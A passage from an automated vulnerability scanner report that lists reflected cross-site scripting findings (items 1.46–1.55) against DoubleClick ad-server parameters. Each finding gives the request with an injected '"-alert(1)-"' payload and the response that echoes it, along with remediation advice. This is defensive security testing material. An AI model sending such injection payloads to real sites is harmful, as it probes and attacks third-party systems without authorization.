<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=10068308"-alert(1)-"d64be5ea104&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt
...[SNIP]...

1.46. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [ppartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1876d"-alert(1)-"160f9d82a0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=1876d"-alert(1)-"160f9d82a0c&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=1876d"-alert(1)-"160f9d82a0c&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.
...[SNIP]...

1.47. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3ce1"-alert(1)-"791190644da was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301b3ce1"-alert(1)-"791190644da&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301b3ce1"-alert(1)-"791190644da&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&
...[SNIP]...

1.48. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d649"-alert(1)-"cfdd3f5d6a4 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.181d649"-alert(1)-"cfdd3f5d6a4&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.181d649"-alert(1)-"cfdd3f5d6a4&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fs
...[SNIP]...

1.49. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 589a1"-alert(1)-"fe600fcd18e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4589a1"-alert(1)-"fe600fcd18e&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
7757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4589a1"-alert(1)-"fe600fcd18e&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&
...[SNIP]...

1.50. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c01f"-alert(1)-"1e1ca44f3c0 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=4766227c01f"-alert(1)-"1e1ca44f3c0&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
= escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=4766227c01f"-alert(1)-"1e1ca44f3c0&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmo
...[SNIP]...

1.51. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda0f"-alert(1)-"fa66ca5b726 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3eda0f"-alert(1)-"fa66ca5b726&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3eda0f"-alert(1)-"fa66ca5b726&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd
...[SNIP]...

1.52. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17b0"-alert(1)-"23356903145 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023e17b0"-alert(1)-"23356903145&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:03:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023e17b0"-alert(1)-"23356903145&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired
...[SNIP]...

1.53. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ad4"-alert(1)-"77acc02db13 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2090ad4"-alert(1)-"77acc02db13&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2090ad4"-alert(1)-"77acc02db13&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.54. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7524b"-alert(1)-"e973f58c800 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=27524b"-alert(1)-"e973f58c800&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:06 GMT
Expires: Mon, 22 Nov 2010 00:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7063

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon
...[SNIP]...
/click%3Bh%3Dv8/3a5a/17/14a/%2a/g%3B231155693%3B0-0%3B0%3B54795159%3B4307-300/250%3B36901567/36919445/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=27524b"-alert(1)-"e973f58c800&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11
...[SNIP]...

1.55. http://ad.vulnerable.ad.partner/adi/N815.zdnet.com/B4822628.3 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N815.zdnet.com/B4822628.3

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81642"-alert(1)-"7b5e5f069a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N815.zdnet.com/B4822628.3;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=19248781642"-alert(1)-"7b5e5f069a0&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/;ord=2010.11.21.21.36.46? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.zdnet.com/blog/computers/micro-center-beats-intels-deal-offers-its-64gb-ssd-for-just-9999-/4283d10a9'%3bdf7c136c81d
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:12 GMT
Expires: Mon, 22 Nov 2010 00:12:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6715

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri
...[SNIP]...
93%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=19248781642"-alert(1)-"7b5e5f069a0&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vr
...[SNIP]...

